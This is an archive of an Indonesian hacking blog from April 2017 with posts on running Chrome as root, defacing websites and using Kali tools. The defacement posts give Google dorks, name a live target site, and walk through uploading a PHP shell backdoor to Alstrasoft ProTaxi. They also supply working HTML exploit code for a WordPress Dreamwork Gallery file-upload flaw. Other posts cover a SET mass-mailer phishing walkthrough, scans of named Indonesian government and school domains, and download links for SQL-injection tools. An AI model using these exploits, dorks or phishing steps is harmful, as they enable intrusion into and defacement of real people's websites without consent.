Siti Nur Holida: April 2017

Archive for April 2017

Mengatasi Google Chrome Tidak Bisa Dibuka di Kali Linux

Ok ini adalah pengalaman saya ketika saya menggunakan Kali Linux dan saya install aplikasi Browser yaitu Google Chrome, setelah saya install kok tidak bisa dibuka, padahal install sudah sukses, hembb berbagai cara sudah saya lakukan, mulai dari restart SO, dan kemudian saya menambah User di Kali linux, dan Chrome dapat dibuka, tetapi kenapa di user Root tidak dapat dibuka.. ?

Akhirnya saya search di Mbah Google dan ketemulah caranya, ? :D

Persiapan :D

Download Script ini :
Script Google Chrome Root - [ Google Drive ]

Langkah - langkah

1. Buka terminal Tercinta anda kemudian ketikkan perintah seperti dibawah ini.

# nano /opt/google/chrome/google-chrome

Kemudian lihat baris yang saya block, tepat dibelakang script itulah kita menambahkan script Google Chrome Root. :D

Mengatasi Google Chrome Tidak Bisa Dibuka di Kali Linux

2. Copy Script Google Chrome Root kemudian pastekan dibelakang script dibawah ini.

exec -a "$0" "$HERE/chrome" "$@"

lihat gambar dibawah ini :D, jika sudah simpan dan close Terminal ente :D

Mengatasi Google Chrome Tidak Bisa Dibuka di Kali Linux

3. Buka Google Chrome anda, dan crotzz, jadi dahhh :D, jika kgx jadi coba di restart dulu PC atau Laptopnya :D

Mengatasi Google Chrome Tidak Bisa Dibuka di Kali Linux

Oke terimakasih sudah berkunjung ke blog tercinta saya :D

Yapss Admin mohon maaf jika ada kesalahan dalam penulisan atau penguploadan, jika ada kesalahan mohon dibenarkan dengan berkomentar di bawah postingan yang salah, berikan saran yang sifatnya membimbing agar blog ini bisa bermanfaat bagi para Newbie di Indonesia tentunya, Jika ingin menyumbangkan Tutornya atau Modulnya silahkan kirimkan ke Email yang sudah saya sediakan, Terimakasih Senpai :*

Greetz : ./Maniak_WiFi

\\ Like, Visit, Follow and Share

>> Halaman FB ** Pringsewu Cyber Team [ Show Off ]

>> Grup FB ** Pringsewu Cyber Team - Official Grup

>> Instagram ** /jack_holeader

>> Twitter ** @JackTersakiti

>> Youtube ** Pringsewu Cyber Team

>> BBM ** 57318B69

// Why So Serious...

Deface Website Alstrasoft ProTaxi Enterprise 3.5 Metode File Upload Vulnerability

Unknown 06.55

Unknown

Deface Website Alstrasoft ProTaxi Enterprise 3.5 Metode File Upload Vulnerability

Selamat malam para pencinta binatang :v, okeh kali ini ane sedikit mau kasih tutor ini, sebelumnya maaf jika jarang posting dikarenakan agenda yang padat di Perkuliahan karena sudah Semester 7 yah udah mulai garap" Skripsi, dan kerja juga sangat melelahkan sekali.

Deface Website Alstrasoft ProTaxi Enterprise 3.5 Metode File Upload Vulnerability

Sekarang materinya masih untuk tinggat Lammer yah yaitu File Upload ajah yang mudah, jadi rule nya ente hanya perlu memiliki email, kemudian ente daftar, lalu ente upload shell dan croot. hahaha, Udah intinya gitu doang sebenernya gx ada yang ribet :v

Dork Google

inurl:/user/signin intext:SIGN IN NOW
inurl:public/user/signup
inurl:public/user/signup site:.id

Gunakan otak vokep ente untuk mendapatkan target yang verawan :D

Langkah Defacenya

1. Buka browser tercinta anda, kopykan Dork lalu Pastekan, dan lihat ada banyak target yang bisa ente testing :D

Deface Website Alstrasoft ProTaxi Enterprise 3.5 Metode File Upload Vulnerability

2. Pilih salah satu target, contohnya seperti dibawah ini :

http://steamsa.com/user/signin

Klik dibagian bawah pada kata [ Create an Account ], nanti akan muncul seperti gambar dibawah ini :D
Isikan Form sesuka ente, yang perlu di ingat hanya [ Email dan Password ] :p, jika sudah puas silahkan klik [ Register ].

Deface Website Alstrasoft ProTaxi Enterprise 3.5 Metode File Upload Vulnerability

3. Jika pendaftaran berhasil maka akan muncul Notive : [ You have successfully registered. Please Login ], lalu isikan [ Email dan Password ] untuk Sign In.

Deface Website Alstrasoft ProTaxi Enterprise 3.5 Metode File Upload Vulnerability

4. Jika berhasil Sign In maka akan masuk ke Dashboard, kemudian ente pilih Menu Profile seperti dibawah ini.

Deface Website Alstrasoft ProTaxi Enterprise 3.5 Metode File Upload Vulnerability

5. Klik Browse dan pilih Shell Backdoor anda, disini saya menggunakan format [ .php ], pilih kemudian klik Update Profile.

Deface Website Alstrasoft ProTaxi Enterprise 3.5 Metode File Upload Vulnerability

6. Jika berhasil maka gambar pada Photo akan menjadi pecah seperti gambar dibawah ini, klik kanan lalu Copy Image Location.

Deface Website Alstrasoft ProTaxi Enterprise 3.5 Metode File Upload Vulnerability

7. Buka Tab baru dan Paste dah disitu, jika berhasil maka akan terbuka dah Shell Backdoor ente, login ke shell ente.

Deface Website Alstrasoft ProTaxi Enterprise 3.5 Metode File Upload Vulnerability

8. Ok sudah berhasil masuk ke Shellnya, sekarang saatnya sedikit penghujatan dengan upload script deface ente :D

Deface Website Alstrasoft ProTaxi Enterprise 3.5 Metode File Upload Vulnerability

9. Inilah script deface sederhana ane yang berhasil bersemayam di Website target :D

Deface Website Alstrasoft ProTaxi Enterprise 3.5 Metode File Upload Vulnerability

Oke itulah trik untuk para Lammer yang ingin belajar, :v ane juga masih Lammer yg penting mau belajar :p
Maaf untuk semuanya jika penjelasan ini kurang jelas :v

Sumber

http://www.tkjcyberart.org/2017/04/exploit-alstrasoft-protaxi-enterprise.html

\\ ::::::::::::::: || My Contact || ::::::::::::::: //

>> Facebook ** Abdur Rozak (Script Kiddie)

>> Twitter ** @JackTersakiti

>> Youtube ** Jack Holeader | Siti Nur Holida

>> Instagram ** jack_holida

>> BBM ** 57318B69

>> LINE ** jack_tersakiti

// :::::::: || Why So Serious || ::::::::: \\

Deface CMS WordPress Metode Exploit Dreamwork Gallery

Unknown 04.57

Unknown

Defacer Exploit 0

Deface CMS WordPress Metode Exploit Dreamwork Gallery

Selamat malam para bokepers, oke kali ini gw mau bahas tehnik deface dengan memanfaatkan bug di Plugin CMS Wordpress, entah kapan tehnik ini ditemukan gw jg kgx ngerti yahh, exploit ini untuk plugin Dreamwork Gallery.

Dork Dreamwork Gallery

Gunakan imajinasi ente untuk dapetin target yang verawan :D

inurl:/wp-content/plugins/wp-dreamworkgallery/
inurl:/wp-dreamworkgallery/ site:.id

Script Uploader

Bisa di download di sini [ PASTEBIN ]

atau bisa copy langsung nih script dibawah ini :D

<html>
<body>
<form action="http://www.site.com/[path]/wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data">
<input type="hidden" name="task" value="drm_add_new_album" />
<input type="hidden" name="album_name" value="Arbitrary File Upload" />
<input type="hidden" name="album_desc" value="Arbitrary File Upload" />
<input type="file" name="album_img" value="" />
<input type="submit" value="Submit" />
</form>
</body>
</html>

www.site.com = ganti dengan domain target anda :v
[path] = jika target ada path, jika tidak iya langsung di tusuk jahh :D

Langkah Exploit Dreamwork Gallery

1. Buka browser tercinta anda, copy Dork dan paste di Search Engine ente, akan muncul banyak target yang tampil tuh, bisa di lihat dibawah ini.

Deface CMS WordPress Metode Exploit Dreamwork Gallery

2. Pilih salah satu target, buka di tab baru, kurang lebih seperti dibawah ini, gx usah di pentingin ini mah, yg penting kita ambil URL domainnya aja :D

Deface CMS WordPress Metode Exploit Dreamwork Gallery

3. Copy Script Uploadernya, paste di Notepad simpan dengan nama [ uploader.html ].

Deface CMS WordPress Metode Exploit Dreamwork Gallery

4. Lalu buka file [ uploader.html ] di browser seperti dibawah ini :D

Deface CMS WordPress Metode Exploit Dreamwork Gallery

5. Klik Browse dan pilih script Deface ente seperti dibawah ini :D, pilih script deface dan klik Open, Habis itu klik Submit untuk proses Uploadnya.

Deface CMS WordPress Metode Exploit Dreamwork Gallery

6. Tunggu beberapa saat, jika muncul seperti dibawah ini kemungkinan berhasil :D, Copy URL yang diblock itu, dan paste di browser.

Deface CMS WordPress Metode Exploit Dreamwork Gallery

7. Jika berhasil maka akan tampil dah script deface ente :D

Deface CMS WordPress Metode Exploit Dreamwork Gallery

Udah gitu ajaa,, simple banget kann. Gunakan otak mesum anda untuk mencari target yang verawan brooww :v

Sumber

http://www.tkjcyberart.org/2017/04/exploit-dreamwork-gallery-file-upload.html

\\ ::::::::::::::: || My Contact || ::::::::::::::: //

>> Facebook ** Abdur Rozak (Script Kiddie)

>> Twitter ** @JackTersakiti

>> Youtube ** Jack Holeader | Siti Nur Holida

>> Instagram ** jack_holida

>> BBM ** 57318B69

>> LINE ** jack_tersakiti

// :::::::: || Why So Serious || ::::::::: \\

Cara Mass Mailer dengan Setoolkit di Kali Linux

Unknown 21.59

Unknown

Exploit Mass Exploit 0

Cara Mass Mailer dengan Setoolkit di Kali Linux

Cara Mass Mailler dengan Setoolkit di Kali Linux

Pengertian Mass Mailler

Mass Mailler adalah suatu kegiatan mengirim email tetapi tujuan email kita untuk banyak email, intinya kita mengirim email yang sama ke semua email yang sudah disiapkan dengan sekali kirim saja.

Untuk melakukan ini kita memerlukan tools disini saya menggunakan tool Setoolkit yang sudah disediakan di Kali Linux.

Persiapan Mass Mailler

Kita siapkan dahulu target kita, atau email-email yang akan kita eksekusi, ketikkan di Note dan simpan di Destop dengan format.txt

Cara Mass Mailler dengan Setoolkit di Kali Linux

Cara Mass Mailer di Kali Linux

1. Buka terminal tercinta anda, lalu ketikkan perintah seperti dibawah ini.

# setoolkit

lalu tekan enter dan tunggu sebentar prosesnya.

Cara Mass Mailler dengan Setoolkit di Kali Linux

2. Jika berhasil terbuka maka akan tampil seperti dibawah ini.

Cara Mass Mailler dengan Setoolkit di Kali Linux

3. Ok sekarang kita mulai, Select from the menu :

set> 1 [ Social Enginering Attacks ]

lalu tekan enter.

Cara Mass Mailler dengan Setoolkit di Kali Linux

4. Setelah itu Select from the menu :

set> 5 [ Mass Mailer Attack ]

Cara Mass Mailler dengan Setoolkit di Kali Linux

5. Kemudian What do you want to do :

set:mailer> 2 [ E-Mail Attack Mass Mailer ]

Cara Mass Mailler dengan Setoolkit di Kali Linux

6. Kemudian pada langkah berikut ini, kita Import file txt kita yang uda kita siapakan diatas.

set:phishing> Path to the file to import into SET : /home/jackholeader/Destop/email-crot.txt

Cara Mass Mailler dengan Setoolkit di Kali Linux

7. Kemudian kita pilih no 1.

set:phishing> 1 [ Use a gmail Account for your email attack. ]

Cara Mass Mailler dengan Setoolkit di Kali Linux

8. Kemudian tuliskan email ente :

set:phishing> Your gmail email address : jackholida@gmail.com

Cara Mass Mailler dengan Setoolkit di Kali Linux

9. Kemudian isikan user.

set:phishing> The FROM NAME the user will see : jackholida
Email password : ( isi password email ente )

Cara Mass Mailler dengan Setoolkit di Kali Linux

10. Jika muncul seperti ini pilih NO

set:phishing> Flag this message/s as high priority ? [yes|no] : no

Cara Mass Mailler dengan Setoolkit di Kali Linux

11. Lalu jika muncul pernyataan seperti ini, pilih y

Do you want to attach a file - [y/n] : y

Cara Mass Mailler dengan Setoolkit di Kali Linux

12. Setelah itu jika muncul pertanyaan seperti dibawah ini.

Enter the path to the file you want to attach : Mass Email Maniak_WiFi

Cara Mass Mailler dengan Setoolkit di Kali Linux

13. Kemudian isi Subject.

set:phishing> Email subject : Testing Mass Email Ajahh

Cara Mass Mailler dengan Setoolkit di Kali Linux

14. Jika seperti dibawah ini pilih p ( plain )

set:phishing> Send the message as html or plain ? 'h' or 'p' [p] : p

Cara Mass Mailler dengan Setoolkit di Kali Linux

15. Kemudian isikan Body message atau isi pesan, tekan enter untuk next line, jika sudah ketik [ END ] huruf kapital semua, lalu takan enter.

Cara Mass Mailler dengan Setoolkit di Kali Linux

16. Kemudian tools akan mengeksekusi secara otomatis, mengirimkan email ke semua email yang ada di .txt tadi, jika sukses, maka akan muncul seperti ini.
SET has finished sending the emails

Cara Mass Mailler dengan Setoolkit di Kali Linux

Ok itulah tutorial sederhana yang bisa saya sampaikan, jika ada pertanyaan silahkan komen saja dibawah.

Download

Cara Mass Mailler dengan Setoolkit di Kali Linux

[ DOWNLOAD ] [ DOWNLOAD ]

\\ ::::::::::::::: || My Contact || ::::::::::::::: //

>> Facebook ** Abdur Rozak (Script Kiddie)

>> Twitter ** @JackTersakiti

>> Youtube ** Jack Holeader | Siti Nur Holida

>> Instagram ** jack_holida

>> BBM ** 57318B69

>> LINE ** jack_tersakiti

// :::::::: || Why So Serious || ::::::::: \\

Cara Mengguanakan URLCrazy di Kali Linux | Information Gathering

Unknown 21.24

Unknown

Information Gathering 0

Cara Mengguanakan URLCrazy di Kali Linux

Pengertian

Urlcrazy adalah sebuah tools information gathering yang sudah tertanam di Kali linux. fungsinya adalah untuk mencari tau kesalahan mengetikan domain agar bisa terhindar dari phising dan Human eror lainnya.

Fungsi Urlcrazy

Berikut ini adalah fungsi dari urlcrazy

Menghasilkan 15 jenis varian domain
Tahu lebih dari 8000 salah eja umum
Mendukung sinar kosmik yang diinduksi sedikit membalik
Beberapa layout keyboard (qwerty, azerty, qwertz, dvorak)
Memeriksa apakah varian domain valid
Uji jika varian domain sedang digunakan
Perkirakan popularitas varian domain

Cara Menggunakan URL Crazy

1. Buka terminal tercinta anda dan ketikkan perintah dibawah ini.

# urlcrazy

Kemudian tekan enter maka akan tampil Help seperti dibawah ini.

Cara Mengguanakan URLCrazy di Kali Linux

Options
-k, --keyboard=LAYOUT Options are: qwerty, azerty, qwertz, dvorak (default: qwerty)
-p, --popularity Check domain popularity with Google
-r, --no-resolve Do not resolve DNS
-i, --show-invalid Show invalid domain names
-f, --format=TYPE Human readable or CSV (default: human readable)
-o, --output=FILE Output file
-h, --help This help
-v, --version Print version information. This version is 0.5

2. Kemudian untuk mencobanya dengan mengetikkan perintah dibawah ini.

# urlcrazy pringsewukab.go.id

Tekan enter dan lihat hasilnya seperti dibawah ini.

Cara Mengguanakan URLCrazy di Kali Linux

3. Kemudian kita ganti stelan keyboard kita dengan keyboard QWERTY, dengan perintah dibawah ini.

# urlcrazy pringsewukab.go.id -k qwerty

lalu tekan enter dan lihat dibawah ini.

Cara Mengguanakan URLCrazy di Kali Linux

Terimakasih sudah berkunjung ke blog sederhana ini semoga bermanfaat.

Download

Cara Mengguanakan URLCrazy di Kali Linux

[ DOWNLOAD ] [ DOWNLOAD ]

Sumber

http://exp-loits.blogspot.co.id/2014/09/tutorial-url-crazy-on-kali-linux.html

\\ ::::::::::::::: || My Contact || ::::::::::::::: //

>> Facebook ** Abdur Rozak (Script Kiddie)

>> Twitter ** @JackTersakiti

>> Youtube ** Jack Holeader | Siti Nur Holida

>> Instagram ** jack_holida

>> BBM ** 57318B69

>> LINE ** jack_tersakiti

// :::::::: || Why So Serious || ::::::::: \\

Cara Scan Website Dengan DMitry di Kali Linux | Information Gathering

Unknown 18.02

Unknown

Information Gathering 0

Cara Scan Website Dengan DMitry di Kali Linux

Penjelasan

DMitry (Deepmagic Information Gathering Tool) adalah perangkat GNU/Linux yang berbasis CLI. Dibangun murni menggunakan bahasa C untuk mendapatkan informasi sebanyak mungkin tentang suatu host

DMitry memiliki fungsi dasar dengan kemampuan untuk menambah fungsi-fungsi baru. Fungsi dasar dari DMitry adalah mengumpulkan informasi dari whois lookup sederhana hingga laporan UpTime dan TCP portscans sebuah host target.

Dmitry adalah sebuah tool yang terdapat pada Backtrack/Kali Linux dengan tujuan untuk dapat mengumpulkan sebanyak-banyaknya informasi mengenai sebuah domain. Tool yang berbasis open source ini juga bisa di jalankan pada OS linux lainnya. Terdapat beberapa parameter yang bisa anda gabungkan dalam proses pencarian informasi suatu domain.

Fungsi Dmitry

fungsi-nya sebagai berikut :
1.Mengumpulkan informasi seperti Who is website atau domain dan ip
2.Mengambil informasi dari Netcraft.com
3.Melakukan pencarian sub domain dari wwensite yg digunakan sebagai target kita
4.Mengumpulkan alamat email domain
5.Melakukan Scanning daftat port yang bersifat terbuka (open)

Cara Menggunakan DMitry

1. Buka terminal kesayangan anda, kemudian ketikkan seperti dibawah ini.

# dmitry

kemudian tekan enter akan muncul seperti gambar dibawah ini.

Cara Scan Website Dengan DMitry di Kali Linux

ini contoh fungsi perintah-nya

-o : untuk menyimpan hasil scannernya
-i : untuk pencarian whois pada alamat ip dari sebuah host
-w : untuk pencarian whois pada nama domain sari sebuah host
-n : Mengambil informasi dari Netcraft.com pada host
-s : mencari penulusuran subdomain
-e : mencari penulusuran e-mail
-p : melakukan port TCP scan Pada host
-f : melakukan port TCP scan pada host menunjukan output dari laporan yang disharing

2. Kemudian kita mulai dengan menggunakan perintah berikut ini.

# dmitry -i www.pringsewukab.go.id

nah habis scaning akan muncul seperti dibawah ini :D

Cara Scan Website Dengan DMitry di Kali Linux

Ada banyak informasi yang ditampilkan dalam scaning diatas, bisa anda manfaatkan sebagai informasi yang penting.

3. Lalu jika ingin scaning port yang terbuka di suatu website silahkan ketikkan perintah dibawah ini.

# dmitry -p smkyasmida.sch.id

Kemudian tekan enter, jika terdapat port yang terbuka maka akan tampil seperti dibawah ini.

Cara Scan Website Dengan DMitry di Kali Linux

4. Untuk melakukan port TCP scan pada host menunjukan output dari laporan yang disharing.

# dmitry -f smkyasmida.sch.id

Kemudian tekan Enter, tampilannya tidak jauh berbeda dengan yang diatas, cuman ini ada tambahan port yang di filtered seperti gambar dibawah ini.

Cara Scan Website Dengan DMitry di Kali Linux

5. Lalu ada tambahan sedikit, seperti perintah dibawah ini.

# dmitry -b smkyasmida.sch.id

dan lihat dibagian bawah port 22 ada tulisan SSH.

Cara Scan Website Dengan DMitry di Kali Linux

OK itulah sedikitnya materi yang bisa saya sampaikan, semoga bermanfaat.
Owner : ./Maniak_WiFi

Download

Cara Scan Website Dengan DMitry di Kali Linux

[ DOWNLOAD ] [ DOWNLOAD ]

\\ ::::::::::::::: || My Contact || ::::::::::::::: //

>> Facebook ** Abdur Rozak (Script Kiddie)

>> Twitter ** @JackTersakiti

>> Youtube ** Jack Holeader | Siti Nur Holida

>> Instagram ** jack_holida

>> BBM ** 57318B69

>> LINE ** jack_tersakiti

// :::::::: || Why So Serious || ::::::::: \\

Download Tools Gr3eNoX Exploit Scanner V1.1 | Tools Hacking

Unknown 09.16

Unknown

Tools Hacking 2

Download Tools Gr3eNoX Exploit Scanner V1.1

Penjelasan Gr3eNoX

Gr3eNoX adalah Sebuah Aplikasi pencarian Web Yang biasa digunakan oleh para Defacer, dan Carder, yang di buat oleh orang yang mempunyai Nickname : Gr3eNoX
Sebenarnya Gr3eNoX sama dengan Google Search Engine, hanya saja Gr3eNoX dapat mencari Website yang Mempunyai kelemahan dan rentan untuk di Hack.

Fungsi Gr3eNoX

Fungsi dari tools ini untuk scan Dork yang kita inginkan, dengan menggunakan tools ini kita bisa mencari target yang benar-benar vuln untuk langkah selanjutnya yaitu SQL Injection.

Tampilan Gr3eNoX

Ini adalah tampilan dari tools Scanner yang gw jelasin diatas.

Download Tools Gr3eNoX Exploit Scanner V1.3

Download Tools Gr3eNoX Exploit Scanner V1.1

Link Download Gr3eNoX

Klik Link Dibawah ini untuk Download Gr3eNoX Exploit Scanner V1.1

~ ^ ~

[ Zippyshare ] [ Google Drive ] [ Kumpul Bagi ]

Laporkan Jika Link Download Mati ! disini. [ Lapor !! ]

Cara Menggunakan Gr3eNoX

Cara Menggunakan Tools ini bisa dilihat di link berikut ini :D

Sumber

https://ainnonny.blogspot.co.id/2017/01/download-gr3enox-exploit-scanner-v11.html

Download Kumpulan Tools Hacking 100% Work

[ DOWNLOAD ] - [ DOWNLOAD ]

\\ Like, Visit, Follow and Share

>> Facebook ** Jack Shredder

>> Instagram ** /abdur.rozak.mw

>> Twitter ** @JackTersakiti

>> Youtube ** Pringsewu Cyber Team

>> BBM ** 57318B69

// Why So Serious...

Download Tools Havij v1.16 Pro Portable Free | Tools Hacking

Unknown 04.08

Unknown

Tools Hacking 0

Download Havij v1.16 Pro Portable

Pengertian Havij

Havij adalah SQL Injection otomatis alat yang membantu penguji penetrasi untuk mencari dan mengeksploitasi kelemahan SQL Injection pada halaman web.

Havij adalah tool sql injection yang memiliki metode injection yang berbeda dari kebanyakan tool karena itu tingkat kesuksesan dalam melakukan SQL injection dengan havij mencapai 95%. Selain itu juga havij memiliki tampilan GUI yang user friendly sehingga dapat dimengeri bahkan untuk pemula sekalipun.

Fungsi Tools Havij

Dump tabel dan kolom, mengambil data dari database, hash password, menjalankan pernyataan SQL dan bahkan mengakses sistem file yang mendasari dan mengeksekusi perintah pada sistem operasi. keuntungan dari softwer ini mudah digunakan untuk semua pengguna bahkan amatir.